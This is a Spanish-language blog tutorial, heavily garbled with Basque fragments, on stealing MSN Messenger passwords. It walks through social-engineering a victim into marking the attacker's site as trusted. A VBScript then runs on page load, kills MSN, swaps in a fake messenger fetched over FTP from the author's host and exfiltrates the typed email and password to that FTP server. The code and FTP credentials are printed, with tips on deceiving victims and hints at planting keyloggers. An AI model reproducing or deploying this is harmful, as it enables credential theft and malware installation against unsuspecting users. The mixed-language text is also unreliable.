Cómo sacar la contraseña del MSN Messenger (propio y funciona)

Si estáis hasta las pelotas de bajaros programas que no funcionan o malditos troyanos que los detectan los antivirus de los “PC clientes”… habéis encontrado lo que buscábais, una forma de sacar la contraseña de la forma más limpia que puede haber, y lo que es más importante, que ellos no se enteren. La forma de lograrlo es algo compleja pero sencilla a su vez, es como todo, algo macarronico o casero, pero funciona, se resume en varias partes. Lo he logrado con un programa de Visual Basic hecho por mí, usando web y ftp. Por cierto si eres un poco listo te darás cuenta que con la primera parte de este documento podrías meterle cualquier fichero en su disco y en el path que quieras, por ejemplo en “C:Dokumentuak eta ezarpenakErabiltzaile guztiakMenú InicioProgramasInicio” burua erabiltzean eta han keylogger bat sartzean dagoen kontua, gauzak ezabatuko dituen fitxategi bat… (tener malas ideas no es lo mio) ;}

Baldintzak:
– Web zerbitzaria.
– FTP zerbitzaria.

The cosa es que el erabiltzaile se konektatzen a web bat eta sin darse kontuan hartzen se le baja un mezulari faltsu (sin egin ezer gehiago egin que sartu zen la web). Cuando vaya a usar su MSN, le salta un falso, que es identico al good, el pardillo mete la contraseña eta el MSN le da un error: “Ez duzu orain konektatu, bla, bla…”, eta edozein botoi (Reintentar, Utzi, al cerrar.) se le ireki el MSN on y se le conecta; el erabiltzaile final ez da sartzen bere kreditalitateak han metido en un server FTP (con su mail + pasahitza) sucedia todo. Al final ez se ez da inoiz arrasto bat jasan.

Steps que debemos hacer nos (como piratillas):

Lehenik, jarri gure web alde batean (ez du pq gure zerbitzari weba izatea, puede ser de Terra…), es esta ejemplo.html. Si usamos de servidor IIS pues lo dejamos en C:inetpubwwwroot o si es un apache pues en /var/www/html/xxxx, si es otro servidor pues donde sea.

Segundo, en un servidor ftp colocamos estos dos ficheros msnmsgr.exe (código fuente en VB – AKI) eta tmp.exe (código fuente en VB – AKI) en el raiz del ftp.

Tercero, una vez que el usuario ya haya metido la gamba y se haya conectado a nuestra web, se haya bajado el messenger malo y se haya intentado conectar en nuestro FTP aparecerá un fichero con su loginname de Windows seguido de la extensión “.msn”, si lo abrís con el notepad veréis algo como:

user msn
messenger
put c:manolito.msn
quit
vi*****@*****il.com
contraseñadelpanoli

Pasos que debe hacer el usuario final (demostración):

Lo único raro (sospechoso) que debe hacer el usuario es meter como Sitios de confianza a nuestro sitio web, pero eso es facil de engañarle, decirle que es por ejemplo la web de la cuadrilla para verla o que tiene que ser así por narices…

Si abre la web le dará un error abajo, entonces se le dice que para que funcione que la meta en “Sitios de confianza”, en este caso yo le he dicho que abra “http://www.bujarra.com/ejemplo.html” pero cada uno que se ponga su html donde le de la gana.

Ondo, esto se lo explicáis o se lo hacéis vosotros, que vaya a “Tresnak” > “Opciones de Internet…”

A la pestaña de “Segurtasuna” y al botón de “Sitios…”

Debe desmarcar el check de abajo (1) y arriba en (2) debe meter el nombre de la web vuestra y darle a “Agregar” y a Aceptar todas las pantallas.

Entonces le saldra esto, le decis que es ‘normal’ y que le de a “Bai”, un amigo me dice… “es que el usuario no es tonto”, y a lo que se debe de responder… “tonto ez, oso tonto”.

Ondo, behin web-ean modu automatikoan sartzen denean honako hau gertatzen zaio:
– El “msnmsgr.exe” jatorrizkoa izena aldatzen da “msnmsgr.old”.
– FTPtik automatikoki kopiatzen da fitxategi bat deiturik “msnmsgr.exe”.
– FTPtik ere bat kopiatzen da deiturik “tmp.exe”

Beraz, erabiltzaileak bere MSN irekiko duenean (eta irekita badu ez kezkatu, pq kill batekin itxiko zaio .exe .tmp izena emateko) honako hau gertatzen da:

MSN Messengerrak lehen aldiz irekitzean hau irekitzen da, MSN Falsuarekiko ahalik eta antzikena dena, eta erabiltzaileak ohitura bezala sakatuko du botoian “Saioa Hasi” edo “Fitxategia” > “Saioa hasi…”

Posta elektronikoa eta pasahitza eskatu eta normalean ez bazaio eskatzen oraingoan bai (eman diezaioten), Egiazko bezalakoa dirudi eh?? jeje, sakatuenean “Onartu” hurrengo errorea jasoko du:

Eta hemen ematen diozunari ematen badiogu, itxiko da eta erabiltzailea eta pasahitza FTP-ra bidaliko dira gure adierazitako helbidera eta ondoren (erdiko segundo batean) itxiko zaio MSN faltsu hau eta berri bat irekiko zaio,

Ikusten duzuenez, ikono txikia behean beti mugitzen hasten da…

Eta gure FTP-ra konektatzen bagara, .msn fitxategi bat ikusiko dugu erabiltzailearen Windows loginarekin eta Notepad-ekin editatzen badugu, bere posta elektronikoa eta pasahitza ikusiko ditugu.

Sinestezina.

PS: Esan gabe doa bakoitzak HTML/Visual Basic kodean FTP zerbitzaria zein den aldatu beharko duela, zein erabiltzailearekin, zein pasahitzarekin… prozedura honetako exekutagarriekin egiten baduzue, lortuko duzuena nire FTP-ra sartzea da, eta hori ez da axola, y podréis verlos usando el mismo usuario/contraseña (msn/messenger).

Que hay que modificar, explicación algo + técnica AKI abajo:

Ondo, una vez visto cómo funciona si quieres usarlo tú, debes usar Visual Basic 6.0 para editar el code fuente que te viene en la web anterior. Aquí se explica que parametros tienes que modificar para que te funtzione con tu sitio web y con tu sitio ftp (incluyendo usuario y contraseña).

Modificación HTML en la web ejemplo.html,

Primero pones otro nombre al HTML, no le llames ejemplo y metes yo que se, unas fotos, algo para engañarle al usuario final. Este sería el script que viene, lo editas con el Bloc de notas por ejemplo y modifica sólo los valores en rojo:

…
<script language=”VBScript” type=”text/VBScript”>
Option Explicit
Dim objShell
Set objShell = CreateObject(“WScript.Shell”)
objShell.Run “%comspec% /c tskill msnmsgr” ,0 <– Este comando de MSDOS mata (si es que lo tiene activo) el MSN Messenger.
objShell.Run “%comspec% /c copy ” & chr(34) & “C:Archivos de programaMSN Messengermsnmsgr.exe” & chr(34) & ” ” & chr(34) & “C:Archivos de programaMSN Messengermsnmsgr.old” & chr(34), 0 <– Este renombra el ejecutable del MSN
objShell.Run “%comspec% /c echo user msn> c:ftp.txt”, 0 <– Crea en C: un fichero temporal para luego ejecutarse y subir esos datos por FTP, en esta linea se mete el usuario del FTP, MODIFICALO.
objShell.Run “%comspec% /c echo messenger>> c:ftp.txt”, 0 <– Ahora mete el password del FTP en el fichero temporal.
objShell.Run “%comspec% /c echo get tmp.exe ” & chr(34) & “C:Archivos de programaMSN Messengertmp.exe” & chr(34) & “>> c:ftp.txt”, 0 <– Obtiene el tmp.exe que este lo que hace es limpiar el PC de la victima de ‘pruebas’.
objShell.Run “%comspec% /c echo get msnmsgr.exe ” & chr(34) & “C:Archivos de programaMSN Messengermsnmsgr.exe” & chr(34) & “>> c:ftp.txt”, 0 <– Con este comando de MSDOS se obtiene el MSN maligggno, jeje.
objShell.Run “%comspec% /c echo quit>> c:ftp.txt”, 0 <– Con el QUIT finalizamos la sesion del FTP.
objShell.Run “%comspec% /c ftp -n -s:C:ftp.txt www.bujarra.com“, 0 <– Ahora sólo queda ejecutar el comando de conexión al FTP, lo hará cuando abra la web.
WScript.Quit
</script>
…

Ondo, ahora queda las modificaciones de VBasic, modifica sólo las palabras en rojo y después recuerda compilarlo y colgarlo del FTP:

Form2 del msnhhh.vbp

Private Sub cmdAceptar_Click()
Dim lpBuff String gisa * 25
Dim ret As Long, UserName String gisa
UserName(lpBuff, 25)
UserName = Left(lpBuff, InStr(lpBuff, Chr(0)) – 1)
FTPusuario = “msn”
FTPpwd = “messenger”
FTPserver = “www.bujarra.com”
Fichero = “C:” & Trim(UserName) & “.msn”
Dim hShell As Long
Dim
hProc As Long
…

Recuerda que los códigos fuentes de estos ficheros los tienes AKI: msnmsgr.exe eta tmp.exe


Izenburuko mezuak

Egilea

nheobug@bujarra.com
Autor del blog Bujarra.com Cualquier necesidad que tengas, ez zalantzarik izan nirekin harremanetan jartzeko, ahal duzun guztietan laguntzen saiatuko naiz, partekatu ahal dudan guztietan ;) . Dokumentuez gozatu!!!